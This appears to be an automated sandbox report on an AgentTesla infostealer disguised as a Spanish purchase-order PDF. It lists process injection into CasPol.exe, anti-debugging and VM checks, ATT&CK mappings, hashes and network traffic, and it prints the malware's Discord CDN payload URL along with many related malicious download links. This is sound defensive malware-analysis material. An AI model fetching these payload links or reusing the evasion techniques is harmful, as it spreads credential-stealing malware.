Source: CasPol.exe, 00000007.00000002.557982348.0000000001611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000007.00000002.558269317.00000000016B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://cdn.discordapp.com/attachments/934180388522299433/935091672193314826/kubaba_yqzTpIrbd157.bin
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367081613.0000000003280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558269317.00000000016B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000

Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5640, type: MEMORYSTR

Source: Yara match	File source: 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5640, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5640, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	Path Interception	111 Process Injection	1 Masquerading	OS Credential Dumping	411 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	331 Virtualization/Sandbox Evasion	Security Account Manager	331 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	114 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDEN DE COMPRA 80107.pdf________________________.exe	18%	Virustotal		Browse
ORDEN DE COMPRA 80107.pdf________________________.exe	23%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://JNREkg.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.133.233	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://cdn.discordapp.com/attachments/934180388522299433/9350	false	high
0,0,289486713,0000000000095000,00000104,00000010,00020000,00000000,1,0	true	low
https://cdn.discordapp.com/attachments/934180388522299433/935091672193314826/kubaba_yqzTpIrbd157.bin	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://JNREkg.com	CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.133.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	558805
Start date:	24.01.2022
Start time:	14:08:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDEN DE COMPRA 80107.pdf________________________.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 8% (good quality ratio 7.1%) Quality average: 54.9% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 98% Number of executed functions: 26 Number of non-executed functions: 13
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:10:59	API Interceptor	505x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.133.233	BFSdrqaAvS.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
	GR01DtRd0N.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
	update[1].exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
	trinitymediaorder-po140521.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843047034843955224/843047170223243314/NioR5xJ1XC9a9v2.exe
	NeworderWJO-002,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/841906355832750103/842664739850944512/zBdd3DFJml9UrbJ.exe
	proforma invoice No. 42037,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839379299009298442/Log_snake.exe
	Proforma adjunta N#U00ba 42037,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839093777200971776/snake_crypted.exe
	Bon_Commande.BC106823.1602202.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/801091101888741379/818969220003790912/fodx.exe
	PO81105083.xlsx	Get hash	malicious	Browse	cdn.discordapp.com/attachments/801449801975726095/801450821929009152/Purchase_Order.exe
	Final documents.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	009845673.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	bPT6aeEo8O.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785404703725977620/785404954315194398/buildkelly.exe
	00094321 Order.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Eanbos9FKi.exe	Get hash	malicious	Browse	162.159.134.233
	ORDEN DE COMPRA 70394.exe	Get hash	malicious	Browse	162.159.134.233
	PO.PU2201126 .doc.exe	Get hash	malicious	Browse	162.159.133.233
	dM07Cj6PlS.exe	Get hash	malicious	Browse	162.159.130.233
	quSd5g7PBl.exe	Get hash	malicious	Browse	162.159.130.233
	F2hGlKmA4R.exe	Get hash	malicious	Browse	162.159.133.233
	uxoLfsJ5KF.exe	Get hash	malicious	Browse	162.159.134.233
	EXPEDIENTE FISCAL Y CITACION No. 020101821010040.exe	Get hash	malicious	Browse	162.159.133.233
	Results.exe	Get hash	malicious	Browse	162.159.133.233
	9mpAQsWojh.exe	Get hash	malicious	Browse	162.159.134.233
	9uYIfsLd8g.exe	Get hash	malicious	Browse	162.159.129.233
	47E9B75457446A3B3C86622DD282065B0F88603E2C009.exe	Get hash	malicious	Browse	162.159.135.233
	2wfv5J3BkH.exe	Get hash	malicious	Browse	162.159.130.233
	c3d0SkUaer.exe	Get hash	malicious	Browse	162.159.130.233
	O5t4RGAkKg.exe	Get hash	malicious	Browse	162.159.134.233
	PasswordManagerAppqf.exe	Get hash	malicious	Browse	162.159.133.233
	2doPTKCqR8.exe	Get hash	malicious	Browse	162.159.130.233
	dU09iakky1.exe	Get hash	malicious	Browse	162.159.133.233
	cExoef9XaY.exe	Get hash	malicious	Browse	162.159.135.233
	VE7wZl9WMj.exe	Get hash	malicious	Browse	162.159.133.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	MAybe bad - InBios International, Inc. ACH Detail 1.21.2022.xlsx	Get hash	malicious	Browse	188.114.96.7
	Halkbank.pdf.exe	Get hash	malicious	Browse	162.159.138.85
	NTN-010122 GJWC-210122.xls	Get hash	malicious	Browse	172.67.153.105
	Eanbos9FKi.exe	Get hash	malicious	Browse	162.159.134.233
	meerkat.arm	Get hash	malicious	Browse	104.30.5.112
	58.Wfp.org_2.htm	Get hash	malicious	Browse	104.16.19.94
	jAgPloGkI8	Get hash	malicious	Browse	172.70.21.4
	y12n2LSmXR	Get hash	malicious	Browse	172.64.209.1
	New Order_780072469097_______________.exe	Get hash	malicious	Browse	162.159.138.85
	GMC_24012022.doc	Get hash	malicious	Browse	104.21.235.160
	ORDEN DE COMPRA 70394.exe	Get hash	malicious	Browse	162.159.134.233
	payment.xls	Get hash	malicious	Browse	172.67.153.105
	PO.PU2201126 .doc.exe	Get hash	malicious	Browse	162.159.133.233
	Purchase Ledger Remittance TYP45785.html	Get hash	malicious	Browse	104.16.19.94
	com.niotron.harshithks3177.turnitin-5-apktada.com.apk	Get hash	malicious	Browse	104.20.185.68
	ACH Payment Confirmation.htm	Get hash	malicious	Browse	104.16.19.94
	com.niotron.harshithks3177.turnitin-5-apktada.com.apk	Get hash	malicious	Browse	104.16.149.64
	Statement of Account.xlsx	Get hash	malicious	Browse	66.235.200.146
	meerkat.ppc	Get hash	malicious	Browse	172.64.31.243
	TjsuEKvHSO.exe	Get hash	malicious	Browse	104.21.3.248

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Eanbos9FKi.exe	Get hash	malicious	Browse	162.159.133.233
	58.Wfp.org_2.htm	Get hash	malicious	Browse	162.159.133.233
	Purchase Ledger Remittance TYP45785.html	Get hash	malicious	Browse	162.159.133.233
	ACH Payment Confirmation.htm	Get hash	malicious	Browse	162.159.133.233
	pago del 20.01.2022.PDF______________________________________.exe	Get hash	malicious	Browse	162.159.133.233
	BQhjVcTYBz.exe	Get hash	malicious	Browse	162.159.133.233
	BQhjVcTYBz.exe	Get hash	malicious	Browse	162.159.133.233
	28207748-2820.hta	Get hash	malicious	Browse	162.159.133.233
	Fax 00538471_pdf.html	Get hash	malicious	Browse	162.159.133.233
	Scanned from a Xerox Multifunction Printer.htm	Get hash	malicious	Browse	162.159.133.233
	1qq1InEPyW.dll	Get hash	malicious	Browse	162.159.133.233
	RAflB6a2EZ.exe	Get hash	malicious	Browse	162.159.133.233
	9761572651.exe	Get hash	malicious	Browse	162.159.133.233
	RAflB6a2EZ.exe	Get hash	malicious	Browse	162.159.133.233
	9761572651.exe	Get hash	malicious	Browse	162.159.133.233
	sanitizedhtmlmalware.html	Get hash	malicious	Browse	162.159.133.233
	pago del 20.01.2022.PDF______________________________________.exe	Get hash	malicious	Browse	162.159.133.233
	47E9B75457446A3B3C86622DD282065B0F88603E2C009.exe	Get hash	malicious	Browse	162.159.133.233
	v5T12thNfA.exe	Get hash	malicious	Browse	162.159.133.233
	d4bw2VNEfb.exe	Get hash	malicious	Browse	162.159.133.233

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF3DFDC0A18C6E3284.TMP

Download File

Process:	C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5176804370857258
Encrypted:	false
SSDEEP:	192://X054dxd6sA6bhFg/J7RJA4ZoEBWc0CRUcu6hnrdAK7q+R1din://XSoxj7bI//J9X8kl5d7RPi
MD5:	A8380A556DB83A33F7EBA03B4D73B00C
SHA1:	FF905006775895EAF4F9324382AD984EDD59F77B
SHA-256:	D4B63288420323011F114B031B4F8C81629B153B527477B7B78C2DFA5EB36F85
SHA-512:	7001ADE8A8F534430AB41CF58068D21504D481B18F45BB35DC28424603D839B2D40E034433404DE8B8EDD57F5CCC74A6285B729B8CE774AC180869E191AC523C
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.6163713423423145
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ORDEN DE COMPRA 80107.pdf________________________.exe
File size:	234664
MD5:	af7c27fd6e49538aa93a667d67463c51
SHA1:	e2da9a0143a07da2b2c498f4622ea5db21d9298f
SHA256:	d7553925a2f9d9840cd23da20f66fcbfb3e7eca2f24c624e2f6139181eefc138
SHA512:	6fdf0a2efc97e8c69c8aa97d4a2f47826c7bc201a8db4323f41ac097925c0c5e919ec7df5e72579d61dab3e7e38f8e8a324ca8a336b55e2ce756838a9bd08122
SSDEEP:	3072:sXFgpRlMXzGWG2z7JHEsmVT0s4L9b3DJpRMWXXHRVo:gORmw2zFEVT54NR18
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1...1...1...-...1.......1.......1..Rich.1..........................PE..L...0f.a..........................................@

File Icon


Icon Hash:	0019797830717130

Static PE Info

General

Entrypoint:	0x4015b8
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x61EE6630 [Mon Jan 24 08:41:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	021148ab9e3c0ac12b1105f8e3760ae5

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Dietitians@Terrorizations6.Si, CN=keraphyllous, OU=HOVEDSTADSKOMMUNE, O=Architecure, L=EUKALYPTUSOLIEN, S=Prointegration, C=IR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	1/24/2022 12:41:21 AM 1/24/2023 12:41:21 AM
Subject Chain	E=Dietitians@Terrorizations6.Si, CN=keraphyllous, OU=HOVEDSTADSKOMMUNE, O=Architecure, L=EUKALYPTUSOLIEN, S=Prointegration, C=IR
Version:	3
Thumbprint MD5:	BE1303855B86E4F48D5A57F935662A94
Thumbprint SHA-1:	80AC2905FEB6F49E6001B047F27CC16C86E48EE2
Thumbprint SHA-256:	F0E4E678BE0A5E24577BFAB858068D4B101D1C87140BCC78FE4981114828BE34
Serial:	00

Entrypoint Preview

Instruction
push 0040E858h
call 00007F9EBC7EDCC5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ch, ch
mov dl, EBh
sbb byte ptr [994ED3DEh], ch
dec ecx
stc
sahf
mov al, 41h
xchg eax, esi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec ecx
outsb
je 00007F9EBC7EDD44h
imul esp, dword ptr [edi+61h], 0035746Eh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
sbb al, 50h
mov dword ptr [edi-2Dh], edx
dec ebp
sti
cmp eax, 8479B84Ah
dec ebx
aas
mov esp, A60C1FE7h
fistp qword ptr [edx-37h]
fadd qword ptr [edi-51h]
sub edx, FFFFFF8Ah
dec ebp
jc 00007F9EBC7EDD45h
lodsb
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
hlt
iretd
add byte ptr [eax], al
xchg ebx, ecx
add byte ptr [eax], al
add byte ptr [eax+eax], cl
dec ebp
popad
popad
outsb
jnc 00007F9EBC7EDD42h
popad
jbe 00007F9EBC7EDD40h
jnc 00007F9EBC7EDCD2h
or eax, 4E000901h
popad

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28e64	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0xcec4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x38000	0x14a8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1b4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28484	0x29000	False	0.374112757241	data	5.25902998253	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2a000	0x154c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0xcec4	0xd000	False	0.109600360577	data	1.79496645519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37e1c	0x10a8	data
RT_ICON	0x35874	0x25a8	data
RT_ICON	0x2c3cc	0x94a8	data
RT_GROUP_ICON	0x2c39c	0x30	data
RT_VERSION	0x2c150	0x24c	data	Bulgarian	Bulgaria

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaHresultCheck, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaVarTstLe, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGet3, __vbaStrCmp, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0402 0x04b0
LegalCopyright	VAR Fas
InternalName	Mousetail6
FileVersion	1.00
CompanyName	VAR Fas
ProductName	VAR Fas
ProductVersion	1.00
OriginalFilename	Mousetail6.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Bulgarian	Bulgaria

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2022 14:09:49.475080013 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.475120068 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:49.475205898 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.690426111 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.690459013 CET	443	49750	162.159.133.233	192.168.2.3
